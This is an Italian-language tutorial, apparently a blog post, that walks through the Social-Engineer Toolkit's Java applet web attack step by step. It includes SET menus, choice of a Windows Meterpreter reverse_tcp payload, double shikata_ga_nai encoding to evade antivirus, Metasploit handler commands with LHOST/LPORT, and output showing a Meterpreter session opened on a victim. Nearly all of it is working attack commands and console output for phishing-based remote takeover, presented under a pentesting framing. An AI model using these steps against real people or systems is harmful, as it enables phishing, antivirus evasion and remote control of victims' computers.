VoIP and Hacking

Il Social-Engineering Toolkit (SET) è una realizzazione di David Kennedy (ReL1K) che mette a disposizione dei pentester alcuni notevoli attacchi di tipo Social-Engineering a partire da una comoda interfaccia utente. L’obiettivo principale di SET è la automazione di tali attacchi.
È possibile scaricare il Social-Engineering Toolkit tramite subversion digitando semplicemente:

# cd /opt/
svn co http://svn.thepentest.com/social_engineering_toolkit/ SET/

dopodiché può essere lanciato:

# cd /opt/set/
# ./set

		                              ,----,
		                            ,/   .`|
		  .--.--.       ,---,.    ,`   .'  :
		 /  /    '.   ,'  .' |  ;    ;     /
		|  :  /`. / ,---.'   |.'___,/    ,'
		;  |  |--`  |   |   .'|    :     |
		|  :  ;_    :   :  |-,;    |.';  ;
		       `. :   |  ;/|`----'  |  |
		  `----.   |   :   .'    '   :  ;
		  __     ||   |  |-,    |   |  '
		 /  /`--'  /'   :  ;/|    '   :  |
		'--'.     / |   |        ;   |.'
		  `--'---'  |   :   .'    '---'
		            |   | ,'
		            `----'                   

  [---]       The Social-Engineer Toolkit (SET)          [---]
  [---]         Written by David Kennedy (ReL1K)         [---]
  [---]               Version: 0.3                       [---]
  [---]      Report bugs to: KennedyD013@gmail.com       [---]
  [---]      Check out: http://social-engineer.org       [---]
  [---] Tutorial: http://offsec.com/metasploit-unleashed [---]

Welcome to the Social-Engineer Toolkit (SET). Your one
stop shop for all of your social-engineering needs..

UPDATE: Version 0.3 is almost completely rewritten with a
ton of new updates and improvements on existing code. Be
sure to review the readme/CHANGES to see a full listing
of new and exciting things. Also note that you can heavily
customize SET and additional features by turning flags on
in the config/set_config file, nano config/set_config for
additional options and customizations.

Diviene subito disponibile un menu di scelta.
Fra le funzionalità attualmente disponibili ne spiccano due, entrambe associabili al phishing, la prima dedicata ad automatizzare l’invio a liste di indirizzi di messaggi di posta contenenti codice malevolo, la seconda all’allestimento di un web server trappola in grado di distribuire una applet java altrettanto malevola.

Select from the menu on what you would like to do:

1. Automatic E-Mail Attacks (UPDATED)
2. Website Java Applet Attack (UPDATED)
3. Update Metasploit
4. Update SET
5. Create a Payload and Listener
6. Help
7. Exit the Toolkit

Enter your choice: 2

Proviamo ad attuare un attacco basato sulla distribuzione di una applet java da parte di un sito web.

The Social-Engineer Toolkit “Web Attack” will create a
fake “professional” looking website for you with malicious
java applet code. When you entice a victim to the website
either through social-engineering, a XSS vulnerability,
E-Mail, or other options, it will prompt the user to say
“Yes” to run the applet signed by Microsoft. Once accepted
a payload will be run on the remote system and executed.

The payload can either be something you specify or
dynamically through the Metasploit framework.

A new addition is the ability to clone a website. SET will
allow you to clone a website you specify and automatically
inject the java applet attack into the website you clone.

This can be useful if you want to make a website look
similar to a company that you are doing a penetration
testing on and want the site to look and feel like their
own. It’s currently experimental. Please email any issues
to kennedyd013@gmail.com

UPDATE: You can now use email phishing with this attack,
change the WEBATTACK_EMAIL=OFF to ON in the config/set_config
file.

XTERM is no longer used and is all in one console, this allows
you to launch SET without needing multiple consoles.

Website Attack Vectors

1. Let SET create a website for you
2. Clone and setup a fake website (NEW)
3. Import your own website (NEW)
4. Return to main menu.

Enter number: 1

Lasciamogli creare in automatico il sito trappola.

Enter your current IP Address: 192.168.1.10

Scegliamo il payload da abbinare

What payload do you want to generate:

Name:                                      Description:

1. Windows Shell Reverse_TCP               Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter         Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL             Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell                      Execute payload and create an accepting port on remote system.
5. Windows Bind Shell X64                  Windows x64 Command Shell, Bind TCP Inline
6. Windows Shell Reverse_TCP X64           Windows X64 Command Shell, Reverse TCP Inline
7. Windows Meterpreter Reverse_TCP X64     Connect back to the attacker (Windows x64), Meterpreter
8. Import your own executable              Specify a path for your own executable

Enter choice (example 1-4): 2

Codifichiamolo nel tentativo di eludere un controllo anti-virus

Below is a list of encodings to try and bypass AV. 

Select one of the below, Shikata_Ga_Nai is typically the best.

1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding

Enter your choice (enter for default): 2

Usually 1 to 4 does the trick, if you get an
error messsage, some encoders don't like
more than one. Specify 0 if you want.

due volte!

How many times do you want to encode the payload: 2

Definiamo una porta su cui attendere la connessione di ritorno:

Enter the PORT of the listener: 8765

partenza!

[-] Encoding the payload 2 times to get around pesky Anti-Virus. [-]

[*] x86/shikata_ga_nai succeeded with size 318 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 345 (iteration=2)

[-] The Ettercap option is currently disabled. [-]
[-] Edit the set_config to turn it on if you want. [-]

***************************************************
Web Server Launched. Welcome to the SET Web Attack.
***************************************************

  [--] Tested on IE6, IE7, IE8 and FireFox [--]

[*] Launching MSF Listener...
[*] Have someone connect to you on port 80...

                 o                       8         o   o
                 8                       8             8
ooYoYo. .oPYo.  o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8  o8P
8' 8  8 8oooo8   8  .oooo8 Yb..   8    8 8 8    8  8   8
8  8  8 8.       8  8    8   'Yb. 8    8 8 8    8  8   8
8  8  8 `Yooo'   8  `YooP8 `YooP' 8YooP' 8 `YooP'  8   8
..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:
::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

       =[ metasploit v3.3.4-dev [core:3.3 api:1.0]
+ -- --=[ 490 exploits - 228 auxiliary
+ -- --=[ 192 payloads - 23 encoders - 8 nops
       =[ svn r8108 updated today (2010.01.13)

resource> use exploit/multi/handler
resource> set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
resource> set LHOST 192.168.1.10
LHOST => 192.168.1.10
resource> set LPORT 8765
LPORT => 8765
resource> set ENCODING shikata_ga_nai
ENCODING => shikata_ga_nai
resource> set ExitOnSession false
ExitOnSession => false
resource> exploit -j
[*] Exploit running as background job.
msf exploit(handler) > [*] Started reverse handler on port 8765

[*] Starting the payload handler...

quando un client vulnerabile si connette al sito trappola, ed accetta come fidata la applet, la trappola scatta inesorabilmente.

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.1.10:8765 -> 192.168.1.253:1046)

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Description  Tunnel
  --  -----------  ------
  1   Meterpreter  192.168.1.10:8765 -> 192.168.1.253:1046